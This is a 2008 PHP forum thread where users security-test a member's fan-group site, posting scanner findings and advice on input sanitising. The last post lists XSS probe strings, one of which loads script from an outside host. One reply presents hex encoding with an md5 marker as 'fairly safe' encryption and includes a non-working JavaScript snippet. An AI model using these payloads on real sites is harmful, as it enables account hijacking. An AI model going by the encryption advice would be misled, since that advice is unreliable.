homechickie Posted September 3, 2008
Hi everyone, I would be grateful if someone could test my site for any security errors. I have a few other people testing, but they have no clue as far as security goes lol.
http://www.myfangroups.com
I have created a username & password for testing purposes for anyone who does not want to sign up.
Username: test
Password: TestAccount1
Thanks so much!
Link to comment https://forums.phpfreaks.com/topic/122465-groupssocial-network/
darkfreaks Posted September 3, 2008
Input Type Password Autocomplete Enabled
Password type input named pass from unnamed form with action ./process.php has autocomplete enabled. An attacker with local access could obtain the cleartext password from the browser cache.
The impact of this vulnerability: Possible sensitive information disclosure
How to fix this vulnerability: The password autocomplete should be disabled in sensitive applications. To disable autocomplete, you may use code similar to <INPUT TYPE="password" AUTOCOMPLETE="off">

User credentials are sent in clear text
The impact of this vulnerability: A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
How to fix this vulnerability: Because user credentials are usually considered sensitive information, it is recommended that they be sent to the server over an encrypted connection.
homechickie (Author) Posted September 3, 2008
Thanks. Something strange though... I have no file named process.php; not sure why that would show up?
darkfreaks Posted September 3, 2008
lol sorry, that's my mistake, I forgot to edit that out; I put it as a general error in my scanner.
Coreye Posted September 3, 2008
Cross Site Scripting (XSS): You can submit ">code when adding blog entries.
http://www.myfangroups.com/members/test&act=blog&id=10
tmbrown Posted September 3, 2008
Do you have a class handling the home.php event-driven page? If not, how are you handling this?

As far as the user credentials go... If you are unable to accommodate SSL on the site, then another option (which I prefer) is to write a method/function, depending on your structure, to encrypt the values on submit. To be able to truly encrypt you will need AJAX to run a processor page to change the actual values on the onchange event. However, here is a PHP example of encryption and decryption.

<?php
// The two methods were posted with `public static` but no enclosing class,
// which does not parse; they are wrapped in a class here (the name Crypt is
// a placeholder, the original post did not give one).
class Crypt {
    public static function Encrypt( $str ){
        $cipher = md5( 15698975412356843216841 );
        $str = bin2hex( $str );            // hex-encode the input
        $hash = $str . $cipher;            // append the fixed md5 marker
        return $hash;
    }
    public static function Decrypt( $hash ){
        $cipher = md5( 15698975412356843216841 );
        $str = substr( $hash, 0, strpos( $hash, $cipher ) ); // cut off the marker
        $hash = pack( "H*", $str );        // hex-decode back to the original bytes
        return $hash;
    }
}
?>

In Encrypt, the string or integer you pass in will be encrypted and a hash will be returned; in Decrypt, you pass a hash that has been encrypted and it will return its decrypted value. This is by no means foolproof. However, md5 is virtually a one-way encryption, and if they knew where the hex started then they could decrypt it; other than that you'd be fairly safe.
darkfreaks Posted September 3, 2008
uhm, that only works for passwords. If you want to make variables safe, just use strip_tags, trim, mysql_real_escape_string; these will avoid SQL injection and Cross Site Scripting.
tmbrown Posted September 3, 2008
Technically it'll work for any string or integer value you want to pass into it, but I understand what you're saying. As far as an immediate change, you will have to use some JavaScript to convert the values before the actual form is submitted. To do this you will need to do something similar to:

<script>
function convPost(){
    var elem = document.forms['yourformid'].elements;
    // walk every field of the form and replace its value with the encrypted form
    for (var i = 0; i < elem.length; i++) {
        elem[i].value = '<?php Class::Encrypt(elem[i].value);?>';
    }
}
</script>
darkfreaks Posted September 3, 2008
That will encrypt the variable and decrypt it. Honestly, the only time you need it is when putting a variable inside a link, in which case I use htmlspecialchars() so people can't inject code into the link.
darkfreaks Posted September 3, 2008
<?php
function clean($text){
    // htmlspecialchars, then trim, then escape for MySQL, then strip tags
    $text = strip_tags(mysql_real_escape_string(trim(htmlspecialchars($text))));
    return $text;
}
?>
You can call clean() whenever you need to sanitize a variable.
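As an added example (not code from this thread or from myfangroups.com), the following contrasts the single clean() call above with encoding chosen per output context, using one of the blog-entry XSS probes reported in this thread as constructed input. It assumes PDO with the SQLite driver is available, and the names html(), link_to() and $pdo are placeholders of my own.

```php
<?php
// Added example: escape at the point of output, per context, instead of in
// one clean() call at input time. Uses an in-memory SQLite database so it
// runs without a MySQL server.

// Constructed sample: one of the probes the scanner reported, plus characters
// that matter in HTML attributes and query strings.
$entry = '<IMG DYNSRC="javascript:alert(\'XSS\')"> & a "quoted" title';

// 1. SQL context: bind the raw value. The prepared statement keeps data and
//    query separate, so the value itself needs no escaping here.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE blog (id INTEGER PRIMARY KEY, body TEXT)');
$stmt = $pdo->prepare('INSERT INTO blog (body) VALUES (:body)');
$stmt->execute([':body' => $entry]);

// 2. HTML body/attribute context: encode once, on the way out.
function html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 3. URL context (the "variable inside a link" case discussed above):
//    percent-encode the value, then HTML-encode the finished attribute.
function link_to(string $base, string $param, string $value): string {
    return html($base . '?' . $param . '=' . rawurlencode($value));
}

$row = $pdo->query('SELECT body FROM blog WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
$stored = $row['body'];

// The database holds the original text unchanged; check it round-tripped.
var_dump($stored === $entry);

// Rendered into a page, the probe becomes inert text rather than markup.
echo '<p>' . html($stored) . "</p>\n";
echo '<a href="' . link_to('/members/test', 'q', $stored) . '">search</a>' . "\n";

// Contrast: clean() above encodes at input time, so a template that encodes
// again at output (as it should) shows the stored entities literally.
echo html(html($entry)), "\n";
```

The last line is what a stored, already-entity-encoded entry looks like once a template encodes it a second time; storing the raw text and encoding once at output avoids that.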
tmbrown Posted September 3, 2008
I understand what you're saying, but I offered my 2 cents' worth for if SSL was unavailable. You are right, and I do use these methods for URL variables; however, it has much potential, but for simplicity's sake I agree with your method for encoding.
darkfreaks Posted October 13, 2008
XSS Injection: The unencoded attack string was found in the HTML of the document for each of the following tested values. Other browsers may be vulnerable to these XSS strings.
Tested value: <IMG DYNSRC="javascript:alert('XSS')">
Tested value: perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
Tested value: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Tested value: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

Also, you might want to check your login and groups for XSS and SQL injection.